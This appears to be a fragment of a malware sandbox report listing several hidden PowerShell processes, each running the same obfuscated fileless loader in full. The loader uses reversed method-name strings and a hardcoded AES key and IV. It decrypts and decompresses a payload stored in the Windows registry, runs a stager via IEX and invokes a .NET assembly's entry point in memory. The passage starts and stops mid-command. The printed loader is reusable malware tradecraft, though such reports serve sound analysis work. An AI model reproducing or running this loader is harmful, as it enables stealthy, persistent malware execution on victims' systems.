'').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        31⤵
        
        PID:3712
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1260).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        31⤵
        
        PID:8820
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1260).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        31⤵
        
        PID:8340
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1260).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        31⤵
        
        PID:10108
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(10108).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join 